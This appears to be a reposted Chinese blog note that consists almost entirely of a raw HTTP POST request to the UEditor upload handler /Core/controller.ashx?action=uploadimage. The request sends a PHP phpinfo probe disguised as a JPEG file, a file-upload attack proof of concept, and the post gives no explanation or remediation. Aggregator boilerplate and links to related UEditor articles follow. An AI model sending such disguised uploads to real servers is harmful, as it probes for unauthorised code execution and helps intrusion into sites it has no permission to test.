记一个ueditor编辑器的上传包/Core/controller.ashx?action=

Posted 向阳-Y.

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了记一个ueditor编辑器的上传包/Core/controller.ashx?action=相关的知识,希望对你有一定的参考价值。

POST /Core/controller.ashx?action=uploadimage HTTP/1.1
Host: x.x.x.x
Cookie: ASP.NET_SessionId=py123
Content-Length: 17678
Cache-Control: max-age=0
Sec-Ch-Ua: ".Not/A)Brand";v="99", "Google Chrome";v="103", "Chromium";v="103"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: https://x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryczzBzaWUGjAy1Vn3
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (Khtml, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-Dest: iframe
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

------WebKitFormBoundaryczzBzaWUGjAy1Vn3
Content-Disposition: form-data; name="upfile"; filename="pppf.jpg"
Content-Type: image/jpeg

<?php phpinfo();?>
------WebKitFormBoundaryczzBzaWUGjAy1Vn3--

以上是关于记一个ueditor编辑器的上传包/Core/controller.ashx?action=的主要内容,如果未能解决你的问题,请参考以下文章

vue“欺骗”ueditor,实现图片上传

ueditor 百度编辑器 配置如何上传图片

UEditor配置图片上传

帝国cms更换Ueditor编辑器上传图片加水印

UEditor UEditor整合项目上传资源到阿里云服务器

百度编辑器ueditor里面的多图上传,点击后弹出一个上传窗口,请问在那个文件修改上传窗口的大小?